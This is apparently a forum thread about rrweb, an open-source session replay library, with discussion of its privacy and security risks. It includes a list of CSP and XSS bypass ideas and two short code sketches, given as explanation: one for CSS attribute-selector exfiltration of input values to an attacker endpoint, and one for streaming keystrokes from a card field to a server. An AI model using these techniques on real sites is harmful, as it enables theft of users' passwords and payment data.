However, as a competitor in the session replay industry and a former security researcher for most of the major players, I'd caution anyone thinking of using a side project like this on production applications to proceed slowly and with care.
Security and privacy are extremely hard to get right here. The tricky thing about session replay analytics is that it presents attackers with a huge attack surface, and a compromise yields a treasure trove of user data. Replay is, by its nature, effectively a sanctioned form of XSS. Modern security features help (CSPs, the iframe sandbox attribute), but browser changes can still cause issues.
Some of the challenges:
- CSPs can often be bypassed using whitelisted Google API libraries, <object>, or <svg>
- Blacklisting <script> tags can often be bypassed with an XML namespace
- CSS-based data or password exfiltration
- Clickjacking, "data:" URLs, etc.
- Could you imagine a web request proxy server deploying Service Workers?
- postMessage() from more deeply nested frames
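To make the CSS exfiltration point concrete, here's a minimal sketch of the classic attribute-selector trick. The field name and endpoint are made up, and this only works when a framework mirrors the live input value into the DOM attribute:

```javascript
// Hypothetical attacker sketch: with style injection alone (no scripts), an
// attribute selector can trigger a network request when an input's value
// attribute starts with a given character, leaking it one char at a time.
// The field name and endpoint are illustrative, not from any real product.
function cssExfilRules(field, chars, endpoint) {
  return chars
    .map(
      (c) =>
        `input[name="${field}"][value^="${c}"] { background-image: url("${endpoint}?c=${c}"); }`
    )
    .join("\n");
}
```

Defenses like a strict style-src in your CSP and never reflecting input values back into attributes blunt this particular trick.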
Substantial work goes into sandboxing replay environments and limiting PII. Defense in depth is particularly important here. Enterprise-level research, auditing, and monitoring should be taken seriously.
Quote from my introduction blog post:
Today we already have some commercial session replay products like LogRocket, FullStory, etc.
If you are just looking for a ready-to-use tool and are willing to pay for a service, I would recommend the products above, because they have well-tested backend services that can store the data for you and provide some higher-order features.
So I don't think rrweb is a competitor to these commercial products.
Actually, I would like to see rrweb grow into a base for many commercial products in the future, which means it would handle most of the privacy and security issues so that other developers can build fancy projects on top of it without solving the hard parts again and again.
One idea I've been toying with is a tool that records testers' movements through our site, aggregates them, and then shows hot and cold spots of our site based on their full run-throughs.
I haven't really dug into your code yet, but it sounds like this might be a good base for that or am I way off base in thinking that?
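My rough mental model (all names made up, purely a sketch) is to bucket recorded click coordinates into a coarse grid and count hits per cell:

```javascript
// Rough sketch of the hot/cold-spot idea: bucket click coordinates from
// recorded sessions into grid cells and count hits per cell. A renderer
// could then color cells by count. Illustrative only.
function heatmapCounts(clicks, cellSize) {
  const counts = {};
  for (const { x, y } of clicks) {
    const key = `${Math.floor(x / cellSize)},${Math.floor(y / cellSize)}`;
    counts[key] = (counts[key] || 0) + 1;
  }
  return counts;
}
```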
Companies like Walgreens should be entirely to blame.
I really do appreciate how the author(s) of that report uncovered how those services were used in practice.
[I'm not with any party listed in the report]
Or some great resources maybe?
I know of the obvious ones like OWASP, but that only scratches the surface.
I've wanted to write a deep dive on JS defense for a while now. I've learned lots of cool stuff I'd love to share, maybe in the next few weeks.
Please do! :)
Since I've seen some people are talking about the open source idea and comparing rrweb to some commercial products, I'd like to share a blog post about the vision of rrweb.
You'll also learn how rrweb works from this post.
Really interested to see how this compares.
I did see the IE11 issue. Are there any thoughts on what can be implemented for a fallback?
BTW, rrweb is also a project to explore the power of modern browsers, so IE issues may not be a high priority.
Has this been normalised? Is this the new default?
Food for thought.
If the privacy implications make us uncomfortable, we might want to stop sharing this kind of information from browsers by default (this seems unlikely), or at least introduce some sort of browser-level controls. Unfortunately, that represents a lot of work and a risk of breaking backwards compatibility, in exchange for very little gain for browsers that don't pride themselves on privacy (e.g. Chrome).
> In addition to being nonfree, many of these programs are malware because they snoop on the user. Even nastier, some sites use services which record all the user's actions while looking at the page. The services supposedly “redact” the recordings to exclude some sensitive data that the web site shouldn't get. But even if that works reliably, the whole purpose of these services is to give the web site other personal data that it shouldn't get.
Always using the most extreme terms just makes it easier to dismiss such views outright.
A friend of mine got a suspicious tax returns email that had a link to a form asking for credit card information. Being careful and responsible, my friend of course asked me if the site looked legit before actually pressing 'submit'.
Of course it was a scam site, and using session recording they could very well have gotten my friend's credit card details without them ever pressing 'submit'.
I think it's always the context that decides whether something is malware. Is a program that erases everything on your disk malware? Perhaps, but if it's a disk formatting tool and you asked it to do so, then it's not.
FWIW you probably wouldn't need something as powerful or blunt as session recording to pull this off, though. You'd only need to listen for keystrokes on the relevant input (with document.addEventListener or similar), and send them to the server as they're typed. Same with partially-filled surveys. IIRC Facebook got in some heat a while ago for sending the partially-typed messages up to the server and to the other chat participant.
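For illustration, that narrower approach is just a few lines; the element selector and "/collect" endpoint below are invented placeholders, not anything any real site uses:

```javascript
// Sketch of the simpler path described above: stream a field's partial
// value on every keystroke, no replay engine needed.
function recordPartialInput(el, send) {
  el.addEventListener("input", () => send({ name: el.name, value: el.value }));
}

// In a page you might wire it up like this (guarded so the sketch also
// runs outside a browser); "/collect" is an invented endpoint:
if (typeof document !== "undefined") {
  const field = document.querySelector('input[name="card"]');
  if (field) {
    recordPartialInput(field, (p) =>
      navigator.sendBeacon("/collect", JSON.stringify(p))
    );
  }
}
```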
Inside your local team you can of course share recordings simply as JSON files, via GitHub and other services.
Another advantage of browser extensions like Kantu, Selenium IDE, and iMacros is that they are more powerful by design, but that is another topic.
So another passion behind rrweb is to show people the 'power' of modern browsers, and I also hope rrweb gets a chance to raise the standard of web privacy.
A nice way would be to do some recording for a week or so. Pull out any sessions that were obviously quite long but where the user didn't achieve anything. Go through them and try improving the UX so users won't get stuck there next time.
Very good work. I am actually a little surprised something like this is open source.
I may consider switching to your library!
Thanks for sharing this :)
A few years ago, I created something very similar while working for validately.com, a user-testing company. The solution was tailored to our needs and was quite unique and rather sophisticated.
A few main points:
- automatic injection of the recording script by proxying the original site/app via our domain (optionally, users could inject the script themselves)
- using an iframe to serve the recorded page in order to preserve context and allow displaying content on top of the page
- audio recording
- broadcasting in real-time
- storing all assets from a recording (images/stylesheets) to make playback independent of the original URLs
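The proxy-injection point in the list above boils down to a simple HTML rewrite; here's a sketch (the function name is made up, and a real proxy also has to rewrite URLs, cookies, CSP headers, and so on):

```javascript
// Sketch of proxy-side recorder injection: insert the recording script
// before </head> in proxied HTML. Illustrative only; a real proxy must
// also handle relative URLs, cookies, CSP headers, streaming, etc.
function injectRecorder(html, scriptUrl) {
  return html.replace(/<\/head>/i, `<script src="${scriptUrl}"></script></head>`);
}
```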
Not everything was perfect and there was always something to improve. Some sites did not work at all due to technical limitations. But the technology was good enough that the company could grow and transition to a WebRTC-based solution.
I am very grateful for that rare opportunity, as the project taught me an insane amount of useful stuff. I would love to work on something similar again.
Take a table: when interacting with it, the cells would just be filler elements. Form field data just wouldn't be captured, and content unique to any record on a page would be filled with sample data.
That way you get to see how someone interacts with a page, but not any context/personal information.
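One way to sketch that idea is to mask values at serialization time, so real text never leaves the browser while the shape of the interaction is preserved (this is illustrative, not any product's actual API):

```javascript
// Sketch of record-time masking: preserve the shape of the text (word
// lengths, letters vs digits) while destroying its content, so replays
// still look realistic. Not any real product's API.
function maskValue(value) {
  return value.replace(/[A-Za-z]/g, "x").replace(/[0-9]/g, "0");
}
```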
I think relying on sensible defaults or redacting data is a lost cause and puts the trust/responsibility in the wrong hands. Some companies may care about redaction while others don't prioritize it.
I mean, come on, how smooth is this library?
I checked the DOM of an AngularJS app, and when I enter something in the input field, it's not appearing in the DOM at all.
This wouldn't pass the first hurdle at my dayjob...
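(If it helps, the likely explanation: typing updates an input's value *property*, not its value *attribute*, so anything that serializes markup alone will miss it. A recorder has to copy the live value back explicitly before snapshotting. A minimal sketch, not rrweb's actual code:)

```javascript
// Typed text lives in the element's `value` property; the serialized DOM
// (the attribute) stays stale. Before snapshotting, copy the property
// back. Minimal sketch; not rrweb's actual implementation.
function reflectInputValue(el) {
  el.setAttribute("value", el.value);
  return el;
}
```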